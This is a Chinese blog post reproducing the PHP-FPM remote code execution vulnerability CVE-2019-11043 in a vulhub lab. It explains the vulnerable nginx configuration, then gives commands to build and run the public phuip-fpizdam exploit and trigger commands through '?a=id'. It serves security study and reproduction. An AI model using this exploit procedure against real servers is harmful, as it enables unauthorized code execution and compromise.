【漏洞复现】PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

最新推荐文章于 2022-06-14 16:29:10 发布
最新推荐文章于 2022-06-14 16:29:10 发布
阅读量498 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 漏洞复现
只能看不能摸哟!
本文链接:https://blog.csdn.net/weixin_45677145/article/details/111750004
版权

文章目录

一、漏洞简介

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) { 
	... 
	fastcgi_split_path_info ^(.+?\.php)(/.*)$; 
	fastcgi_param PATH_INFO $fastcgi_path_info; 
	fastcgi_pass   php:9000; 
	...
}

攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp(正则表达式)。 Regexp被损坏导致PATH_INFO为,从而触发该漏洞。

CGI的环境变量PATH_INFO的内容是URL中的一部分,例如请求URL为下面所示时,PATH_INFO获得的值为/yunsle1/yunsle2
http://10.211.55.6/index.php/yunsle1/yunsle2?a=yunsle

影响范围:
在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

  • PHP 7.0 版本
  • PHP 7.1 版本
  • PHP 7.2 版本
  • PHP 7.3 版本

二、漏洞环境准备

攻击机:kali

  • 安装golang环境:
apt-get install golang -y

靶机:Ubuntu

  • 使用vulhub进行漏洞环境的复现
    在这里插入图片描述

三、漏洞复现

环境启动后,访问http://your-ip:8080/index.php即可查看到一个默认页面。
在这里插入图片描述

安装漏洞利用工具EXP:

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam

在这里插入图片描述

go get -v 查看版本信息
go build 执行完之后会生成一个可执行文件

在这里插入图片描述
报错原因:默认使用的是proxy.golang.org,在国内无法访问
报错解决:执行命令:go env -w GOPROXY=https://goproxy.cn(换一个国内能够访问的代理地址)
在这里插入图片描述
执行命令:

./phuip-fpizdam "http://xxx:8080/index.php"   
或
go run . "http://xxx:8080/index.php"

漏洞利用:
在这里插入图片描述
在这里插入图片描述
注意:因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。

我是大肥鼠
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞利用】CVE-2019-11043 PHP 远程代码执行漏洞
weixin_43486390的博客
02-27 1160
本文借鉴了FLy_鹏程万里大佬的《Kali Linux下go语言环境搭建》 链接:https://blog.csdn.net/Fly_hps/article/details/81073316 整合了一些文章作为自己的笔记,以便后续记忆学习。 0x01 背景 9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且...
php-fpm未授权访问漏洞
最新发布
求大佬师傅带
09-10 1072
php-fpm未授权访问漏洞
【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
cc1988429的专栏
10-12 7119
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 湛蓝天空 声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试
php-fpm (CVE-2019-11043)漏洞
thelostworld
05-11 270
漏洞详情来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大影响版本当Nginx + php-
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 652
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
PHP-CGI远程代码执行漏洞分析与防范
12-20
【PHP-CGI远程代码执行漏洞分析与防范】 PHP-CGI远程代码执行漏洞是针对PHP运行模式中的CGI接口的一种安全缺陷,可能导致攻击者能够在服务器上执行任意代码,从而获取服务器控制权。该漏洞主要出在PHP的CGI sapi...
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github....fpizdamale@Pentest ~/go lsbin ...
解决Linux下php-fpm进程过多导致内存耗尽问题
12-20
在Linux系统中,php-fpm(FastCGI Process Manager)是PHP的一个重要组件,它用于管理PHP进程池,处理来自Web服务器(如Nginx)的请求。当php-fpm进程过多时,可能会导致内存耗尽,从而影响到其他服务,如数据库服务...
PHP-FPM性能优化
10-22
在Nginx上运行PHP应用程序时,通常会将请求转发给PHP-FPM进行解析和执行。从PHP 5.4版本开始,PHP-FPM被集成到PHP源码中,使得安装和使用更加方便。 ### 一、安装PHP-FPM 在编译PHP时,需要添加`--enable-fpm`参数...
解决php-fpm.service not found问题的办法
01-21
前言 本文给大家详细介绍了解决php-fpm.service not found...然后准备执行 service php-fpm start 时出错了 错误如下 Failed to start php-fpm.service: Unit php-fpm.service not found. 提示 php-fpm.servi
php-fpm在nginx特定环境下的任意代码执行漏洞CVE-2019-11043)
无心的博客
10-26 1680
目录 0x01 漏洞介绍 0x02 漏洞影响 0x03 漏洞 0x01 漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发,向目标服务器 URL 发送 符号时,服务返回异常,疑似存在漏洞。 在nginx上,fastcgi_split_path_info处理带有 的请求时,会因为遇到换行符n,导致PATH_I...
Fastcgi php-fpm 漏洞利用方式
weixin_34112900的博客
03-31 504
fastcgi php-fpm 端口对外开放 外部提交的命令可以执行https://github.com/adoy/PHP-FastCGI-Clientlocal/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hosts 转载于:https://blog.51cto.com/0x007/1626946...
nginx平滑升级完整版
weixin_46040962的博客
09-08 1709
nginx平滑升级完整版 前言:因公司漏洞扫描发高危漏洞,要求修漏洞 nginx resolver 释放后重利用漏洞(CVE-2016-0746)修,拿到这个漏洞的时候整个人都是懵的,wc,我才两年多Java开发工作经验需要我升级服务器漏洞?心里一万头cnm在奔腾…好吧,即使再不情愿也需要修…只能在网上找了一大堆博客做出总结。 准备nginx平滑升级完整版一、什么是nginx resolver 释放后重利用漏洞(CVE-2016-0746)?nginx是一款使用非常广泛的高性能web服务器。 ==
Nginx漏洞利用与安全加固
weixin_30631587的博客
07-16 1339
本文主要分为两大部分,第一部分介绍了Nginx的一些常见安全漏洞的形成原因、利用方法,并给出了相应的解决办法;第二部分介绍了Nginx安全加固时需要关注的主要内容。 Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows等操作系统上,...
Fastcgi协议与PHP-FPM 攻击方法
05-25 780
1、CGI(Common Gateway Interface) 通用网关接口 最早的服务器只能够返回静态资源给浏览器。但这种方式满足不了人们的所有需求,于是出了动态网站技术,但是Web服务器不能够直接解释执行动态脚本,于是人们为了能够让Web服务器与外部应用程序(CGI程序)互相通信。CGI通用网关接口应运而生。简单地说CGI就像是一种协议,这种协议规定了Web服务器和运行在Web服务器上的应用程序进行交流的方式。 当Web服务器需要解析动态脚本时,Web服务器会Fork一个新的进程来启动CGI成语完
nginx平滑升级解决 nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372)
热门推荐
weixin_44460932的博客
06-14 1万+
关于漏洞扫描nginx安全漏洞的修。 服务器漏洞扫描中扫出了nginx的安全漏洞,nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372),受影响版本为0.6.18-1.20.0;给出解决办法为升级补丁修,由于漏洞较多考虑平滑升级。 官方下载渠道下载1.20.0以上版本的linux。下载地址: http://nginx.org/en/download.html 我使用的服务器是linux系统,推荐下载官网Stable version的1.22.0版
CVE-2019-11043 Nginx PHP 远程代码执行漏洞----自我学习
Ping_Pig的博客
10-27 3759
漏洞简介: 来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发了这个0day漏洞,9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大 漏洞概述: Nginx上fas...
cve漏洞php,PHP-FPM 远程代码执行漏洞CVE-2019-11043)的简单学习
weixin_42300400的博客
03-19 272
1.概述漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码...
LAMP+php-fpm服务器+php7.16
01-10
LAMP (Linux, Apache, MySQL, PHP) 是一种流行的网络应用程序解决方案,最近还引入了 php-fpm 服务器 php7.16。当将 Apache 服务器与 php-fpm 服务搭载后,大大增强了高并发性能,弥补了以往的短板。通过创建用户及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值